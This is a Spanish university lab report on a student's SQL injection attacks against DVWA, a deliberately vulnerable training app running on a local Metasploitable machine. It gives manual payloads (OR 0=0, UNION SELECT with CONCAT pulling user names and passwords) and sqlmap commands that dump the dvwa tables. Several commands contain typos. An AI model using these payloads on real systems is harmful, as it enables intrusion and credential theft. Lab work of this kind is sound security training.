Encabezado: ATAQUES SQL INJECTION CONTRA DVWA

ATAQUES SQL INJECTION CONTRA DVWA - Actividad 2

Damián Augusto Sánchez Cruz

Universidad Internacional de la Rioja

Notas del autor

Damián Augusto Sánchez Cruz

Máster Universitario en Seguridad Informática, Universidad Internacional de la Rioja

Este trabajo es financiado por el alumno

La correspondencia relacionada con este trabajo debe ser dirigida a Damián Augusto

Sánchez Cruz, Carrera 69D 96-39 Bogotá D.C., Colombia

Contacto: damianaugusto.sanchezas1@comunidadunir.net
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
2

Índice General

Instrucciones ........................................................................................................................................3

Desarrollo .............................................................................................................................................4

Apartado 1 .........................................................................................................................................4

Apartado 2 .........................................................................................................................................8
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
3

Instrucciones

Trabajo: Realizar ataques SQL Injection contra la aplicación DVWA

En la siguiente actividad deberás realizar diversos ataques sobre la aplicación DVWA utilizando la
técnica de SQL Injection.
Para ello, se deberán usar tanto técnicas de explotación manual como herramientas automáticas,
por ejemplo, SQLMap.
El alumno deberá explicar y razonar debidamente los pasos dados para la realización de cada uno
de los apartados indicados a continuación.
Apartado 1:
Usando técnicas de explotación manual, el alumno deberá:

• Indicar cuál/cuáles son los parámetros vulnerables de la URL.

• Obtener los nombres de las bases de datos disponibles.
• Obtener los usuarios de la base de datos DVWA.
• El alumno deberá usar para la explotación los comandos SQL UNION y CONCAT

Apartado 2:

En este apartado el alumno deberá usar herramientas automáticas de explotación, por ejemplo,
SQLMap. El alumno deberá:

• Recuperar los nombres de las tablas de la base de datos DVWA.

• Recuperar el contenido de las tablas de la base de datos DVWA.

Extensión máxima: 10 páginas (Georgia 11 e interlineado 1,5).

.
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
4

Desarrollo

Apartado 1

• Indicar cuál/cuáles son los parámetros vulnerables de la URL.

Ingresar a el explorador WEB Firefox y explorar la dirección IP del servidor web con la
instalación DVWA (Maquina Metasplotaible)

Ingresar a DVWA con usuario admin y password password

Configurar la seguridad de DVWA a low.

Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
5

Ingresamos a SQL injection.

Ingresamos los datos para identificar las url vulnerables.

Al ingresar 1 y pulsar submit se retorna los usuarios por que envía los parámetros por un
método get.

url vulnerable: http://192.168.116.141/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
6

Para identificar una url vulnerable podemos ingresar la sentencia

id='q&Submit=Submit# en la URL, y si arroja como resultado un error SQL, sabemos que es
vulnerable.

• Obtener los nombres de las bases de datos disponibles.

Ingresar a el explorador WEB Firefox y explorar la dirección IP del servidor web con la
instalación DVWA (Maquina Metasploitable) lista las bases de datos disponibles en el servidor.
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
7

• Obtener los usuarios de la base de datos DVWA.

Ingresamos un comodín de consulta %´or ´0´=´0 nos arroja todos los usuarios de la base
de datos DVWA.
En este caso, es el código inyectado hace que la consulta sea “verdadera”, por qué la consulta
evalúa un id = % o 0 = 0, la consulta se vuelve verdadera para todos los registros de la
tabla, por lo tanto trae todos los usuarios existentes.

• El alumno deberá usar para la explotación los comandos SQL UNION y CONCAT

Ingresamos %' or '0'=0 union select null, version() # generamos una consulta de versión de la
base de datos instalada
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
8

%’ or 0=0' union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)

from users #

Apartado 2:

En este apartado el alumno deberá usar herramientas automáticas de explotación, por ejemplo,
SQLMap. El alumno deberá:

• Recuperar los nombres de las tablas de la base de datos DVWA.

Ingresamos a la aplicación sqlmap de kali Linux

Ejecutamos la sentencia para que nos muestre las bases de datos disponibles.

sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;

rv:54.0) Gecko/20100101 Firefox/54.0" –-cookie="security=low"

PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u

http://192.168.116.141/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"

Terminada la ejecución de la acción indicada, nos muestra 7 bases de datos

encontradas:
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
9

• Recuperar el contenido de las tablas de la base de datos dvwa.

Tabla guestbook:

Ejecutamos la sentencia:

sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;

rv:54.0) Gecko/20100101 Firefox/54.0" –-cookie="security=low"

PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u

http://192.168.116.141/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"

–batch –dump –T guestbook –D dvwa

Tabla users

De igual forma se usa la misma sentencia, pero cambiamos el nombre de la tabla, así:

sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;

Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
10

rv:54.0) Gecko/20100101 Firefox/54.0" –-cookie="security=low"

PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u

http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"

–batch –dump –T users –D dvwa